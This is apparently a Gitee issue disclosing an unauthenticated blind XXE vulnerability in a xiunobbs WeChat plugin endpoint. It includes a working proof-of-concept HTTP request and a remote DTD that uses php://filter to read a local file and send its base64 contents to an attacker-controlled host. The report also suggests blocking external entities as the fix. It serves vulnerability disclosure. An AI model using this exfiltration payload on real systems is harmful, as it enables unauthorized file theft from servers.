Score
0
Watch 138 Star 519 Fork 161

xiuno / xiunobbsPHP

blind XXE in /xiunobbs/plugin/xn_wechat_public/route/token.php and no login

Open
c0d1M4x  Opened this issue

Code analysis

The XXE vulnerability is located in /plugin/xn_wechat_public/route/token.php, responseMsg function is called.

token.php

responseMsg function is defined in /plugin/xn_wechat_public/model/wechat.class.php ,then simplexml_load_string is called,and the value of the incoming parameter is obtained through php://input. No restrictions on external file references.

wechat.class.php

Testing process

Test found that /plugin/xn_wechat_public/route/token.php can be accessed directly without login.So we can send POC directly to the server and get something content.

POC

POST /xiunobbs/plugin/xn_wechat_public/route/token.php HTTP/1.1
Host: 192.168.126.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 157

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://192.168.126.128:8000/getfile.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>

getfile.dtd

<!ENTITY % data SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://192.168.126.128:12345/?%data;'>">

We can use it to read any file in the system.

testing

send the poc

send poc

The attack server will receive the contents of the c:/windows/win.ini file.
win.ini

and decode by base64 algorithm

content

total 1 participants

Comments (1)

c0d1M4x 2019-12-24 22:37

Resolve

Prohibit references to external entities

Sign in to comment

Assignees
Labels
Not set
Projects
Milestones
Branches
Planed to start
Not set
Planed to end
Not set
Top level
Priority
PHP
1
https://gitee.com/xiuno/xiunobbs.git
git@gitee.com:xiuno/xiunobbs.git
xiuno
xiunobbs
xiunobbs

Help Search